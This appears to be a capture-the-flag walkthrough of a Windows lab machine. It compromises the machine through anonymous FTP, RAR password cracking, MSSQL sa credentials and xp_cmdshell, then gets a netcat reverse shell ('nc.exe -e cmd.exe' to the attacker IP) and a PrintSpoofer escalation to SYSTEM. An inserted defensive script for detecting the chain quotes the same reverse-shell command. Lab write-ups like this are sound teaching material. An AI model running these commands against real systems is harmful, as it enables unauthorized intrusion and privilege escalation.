# Meathead

## Nmap

```
sudo nmap 192.168.67.70 -p- -sV -sS  

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1221/tcp open  ftp           Microsoft ftpd
1435/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; 
CPE: cpe:/o:microsoft:windows
```

`FTP` on port 1221 allows anonymous login; connect with passive mode (`-p`) enabled.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9d2a63a2755c56b2806be3f6d18d620e1bb116ca%2Fimage.png?alt=media)

Using the `get` command to download the `MSSQL_BAK.rar` file and then running `unrar` shows that we need a password to extract the archive.

```
unrar e <archive>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e64ab1476d6cec427e77748f81317a73ebbcaf43%2Fimage.png?alt=media)

We can use the `rar2john` binary that comes with John the Ripper to extract a hash from the password-protected RAR file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e8eeb5f1bb65a6c2ce99200aa6820c8c198cddf%2Fimage.png?alt=media)

On my main Windows host I used `hashcat` to crack the hash; the command used is shown below the `cmd.exe` window. The cracked password is: `letmeinplease`

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5569ce871789ae59f5438e6620ecf15151d1ecd6%2Fimage.png?alt=media)

Back on the Kali VM I ran `unrar` again, and this time the archive extracted successfully.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6fb2aea6ee040b0aa88e9510216f6b58cdd37546%2Fimage.png?alt=media)

Reading the contents of `mssql_backup.txt` provides the following credentials: `sa:EjectFrailtyThorn425`

We can then use Impacket's `mssqlclient.py` to connect to the target machine's SQL Server.

```
mssqlclient.py -port 1435 sa:EjectFrailtyThorn425@192.168.67.70
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f7ec6524fcf2b8cad12e86f8160507428176114d%2Fimage.png?alt=media)

From here we can run `enable_xp_cmdshell` and then confirm command execution with `xp_cmdshell whoami`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5e858ba3f24e10ea1703b34f459c470ed9f526bc%2Fimage.png?alt=media)

For various reasons I was unable to use `certutil.exe` or PowerShell for file transfer, so instead I set up an `SMB` server on my attacking machine with Impacket's `smbserver.py`.

```
sudo python2 smbserver.py Share /home/kali/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ab6c7855785afa326218ed9a8404dad399549859%2Fimage.png?alt=media)

We then need to ensure `nc.exe` exists in the directory the `SMB` server is sharing, and set up a `netcat` listener on the attacking machine.

```
nc -lvp 1221
```

Then run the following command on the SQL server through `xp_cmdshell`:

```
xp_cmdshell \\192.168.49.67\Share\nc.exe -e cmd.exe 192.168.49.67 1221
```
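From the defender's side, the chain just described (switching on `xp_cmdshell`, then having `sqlservr.exe` launch a shell that runs `nc.exe` straight from an SMB share) leaves a recognisable trail in the SQL Server ERRORLOG and in process-creation telemetry. The following Python script is an added example, not part of the original writeup: the ERRORLOG lines use SQL Server's real `sp_configure` wording, the Sysmon Event ID 1 records are constructed and rendered as quoted `key="value"` pairs, and the `192.0.2.10` address is a constructed placeholder.

```python
import re

# Constructed sample telemetry for this example. The ERRORLOG wording is the
# format SQL Server uses when sp_configure changes an option; the Sysmon
# Event ID 1 records are rendered as quoted key="value" pairs for brevity.
ERRORLOG = r"""
2024-01-01 10:00:01.01 spid51  Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-01 10:00:01.05 spid51  Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-01 10:00:02.00 spid52  Using 'xpstar.dll' version '2017.140.1000' to execute extended stored procedure 'xp_cmdshell'.
"""

SYSMON = r"""
ParentImage="C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c whoami"
ParentImage="C:\Windows\System32\cmd.exe" Image="\\192.0.2.10\Share\nc.exe" CommandLine="\\192.0.2.10\Share\nc.exe -e cmd.exe 192.0.2.10 1221"
ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe"
"""

XP_ENABLED = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")
XP_USED = re.compile(r"extended stored procedure 'xp_cmdshell'")
NC_SHELL = re.compile(r"\bnc(64)?\.exe\b.*\s-e\s")
FIELD = re.compile(r'(\w+)="([^"]*)"')

def errorlog_findings(text):
    """Flag xp_cmdshell being switched on and its first use, keyed by spid."""
    out = []
    for line in text.strip().splitlines():
        spid = line.split()[2]
        if XP_ENABLED.search(line):
            out.append(("xp_cmdshell_enabled", spid))
        elif XP_USED.search(line):
            out.append(("xp_cmdshell_first_use", spid))
    return out

def sysmon_findings(text):
    """Flag the process-tree shape this chain produces: sqlservr.exe spawning a
    shell, a binary executed straight from a UNC share, and netcat -e usage."""
    out = []
    for line in text.strip().splitlines():
        ev = dict(FIELD.findall(line))
        parent, image, cmd = ev.get("ParentImage", ""), ev.get("Image", ""), ev.get("CommandLine", "")
        if parent.lower().endswith("\\sqlservr.exe"):
            out.append(("sqlservr_child_process", image))
        if image.startswith("\\\\"):
            out.append(("exec_from_unc_path", image))
        if NC_SHELL.search(cmd):
            out.append(("netcat_reverse_shell_args", cmd))
    return out
```

Each finding is a `(rule, detail)` tuple, so the script can be pointed at a real ERRORLOG or an export of Sysmon events once the field parsing is adapted to that source's format.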

We now have a proper reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a66d382b686becf6f430e07dbdb9197515e6ec2c%2Fimage.png?alt=media)

Once connected, checking privileges with the `whoami /all` command shows that we have the `SeImpersonatePrivilege` permission.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dca70ce8ae85d6bfdd56936ecd632f125a9912a6%2Fimage.png?alt=media)

Checking `systeminfo` for the version of Windows Server running shows we are on Windows Server 2019.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f25bd668831a40ba50a766b45076830f94b02806%2Fimage.png?alt=media)

Given the privileges and the version of Windows Server running, a JuicyPotato attack is unlikely to succeed. It is probable, however, that we can take advantage of these permissions with a `PrintSpoofer.exe` attack.

Binary: <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

Download the binary and place it in the `SMB` share we set up earlier with `smbserver.py`. I then moved over to the FTP directory at `C:\FTP`, as this is writable by the current service account `mssql$sqlexpress`.

I then copied the binary to the current working directory:

```bash
copy \\<Attacking-IP>\Share\PrintSpoofer.exe
```

Then I executed `PrintSpoofer.exe` with switches to spawn a **SYSTEM** shell in the current shell.

```bash
printspoofer.exe -i -c cmd
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dce1879502dfe1b6a839f79d4f90b38299b847cf%2Fimage.png?alt=media)
